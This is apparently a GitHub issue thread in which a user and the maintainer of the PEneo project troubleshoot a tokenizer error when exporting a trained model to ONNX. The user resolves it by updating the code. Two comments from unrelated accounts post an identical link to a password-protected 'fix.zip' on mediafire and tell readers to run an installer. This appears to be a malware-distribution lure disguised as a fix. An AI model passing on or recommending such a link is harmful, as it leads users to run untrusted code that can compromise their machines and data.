### ISSUE TITLE
export onnx

### ISSUE THREAD

**Issue by isXuedingesCat** [ZeningLin/PEneo#3]
使用tools/export_onnx.py 导出自己训练的模型(基于layoutlmv-base-chinese预训练模型)时报错。
执行 python tools/export_onnx.py --model_name_or_path ./weights --output_path  .  
训练完模型保存在  ./weights 目录下。

Traceback (most recent call last):
  File "D:\miniconda\envs\vie\lib\site-packages\transformers\tokenization_utils_base.py", line 2311, in _from_pretrained
    tokenizer = cls(*init_inputs, **init_kwargs)
  File "D:\miniconda\envs\vie\lib\site-packages\transformers\models\xlm_roberta\tokenization_xlm_roberta.py", line 124, in __init__
    self.sp_model.Load(str(vocab_file))
  File "D:\miniconda\envs\vie\lib\site-packages\sentencepiece\__init__.py", line 961, in Load
    return self.LoadFromFile(model_file)
  File "D:\miniconda\envs\vie\lib\site-packages\sentencepiece\__init__.py", line 316, in LoadFromFile
    return _sentencepiece.SentencePieceProcessor_LoadFromFile(self, arg)
OSError: Not found: "None": No such file or directory Error #2

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "D:\Code\PEneo-release\tools\export_onnx.py", line 132, in <module>
    main()
  File "D:\Code\PEneo-release\tools\export_onnx.py", line 63, in main
    processor = backbone_info.processor.from_pretrained(
  File "D:\miniconda\envs\vie\lib\site-packages\transformers\processing_utils.py", line 465, in from_pretrained
    args = cls._get_arguments_from_pretrained(pretrained_model_name_or_path, **kwargs)
  File "D:\miniconda\envs\vie\lib\site-packages\transformers\processing_utils.py", line 511, in _get_arguments_from_pretrained
    args.append(attribute_class.from_pretrained(pretrained_model_name_or_path, **kwargs))
  File "D:\miniconda\envs\vie\lib\site-packages\transformers\tokenization_utils_base.py", line 2089, in from_pretrained
    return cls._from_pretrained(
  File "D:\miniconda\envs\vie\lib\site-packages\transformers\tokenization_utils_base.py", line 2313, in _from_pretrained
    raise OSError(
OSError: Unable to load vocabulary from file. Please check that the provided vocabulary is accessible and not corrupted.

环境：
window10
tqdm==4.66.1
transformers==4.40.1
tensorboard==2.15.1
timm==1.0.8
accelerate==0.27.2
SentencePiece==0.2.0

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZeningLin** [comment]
`--output_path` 这个参数改成 peneo.onnx 试试，要具体到onnx的文件名称的

**Comment by isXuedingesCat** [comment]
> `--output_path` 这个参数改成 peneo.onnx 试试，要具体到onnx的文件名称的

还是不行，报一样的错误。
我试了参照 deploy/inference.py 中的代码，修改 export_onnx.py 第 63 行部分为     processor = backbone_info.processor.from_pretrained(
        # model_args.model_name_or_path, use_fast=tokenizer_use_fast
        model_args.model_name_or_path, use_fast=True, apply_ocr=False
    )  
这样报错内容会变为 TypeError: PEneoModel.forward() takes 1 positional argument but 6 were given

**Comment by ZeningLin** [comment]
可能是sentencepiece的锅。我这边的环境是`sentencepiece==0.1.99`，改一改看看行不行。

**Comment by ZeningLin** [comment]
你的权重目录`./weights`的结构方便给我看看吗？里面应该要有模型和tokenizer的config JSON文件。看看有没有`sentencepiece.bpe.model`，`tokenizer_config.json`、‘special_token_map.json’这几个文件，没有的话估计是save的时候保存失败了，得从预训练权重的目录里面复制进来。

**Comment by isXuedingesCat** [comment]
weights目录下的文件，我删除了保存是的run目录和checkpoints目录
-weights
    --all_results.json
    --args.json
    --config.json
    --detail.json
    --eval_results.json
    --model.safetensors
    --preprocessor_config.json
    --special_tokens_map.json
    --tokenizer.json
    --tokenizer_config.json
    --trainer_state.json
    --training_args.bin
    --train_results.json
我试了把预训练权重中的 sentencepiece.bpe.model 复制到weights中再执行，错误变成了
 TypeError: PEneoModel.forward() takes 1 positional argument but 6 were given

**Comment by ZeningLin** [comment]
git pull更新一下代码看看彳亍不彳亍

**Comment by isXuedingesCat** [comment]
> git pull更新一下代码看看彳亍不彳亍

可以了，已经成功导出onnx. 谢谢大佬
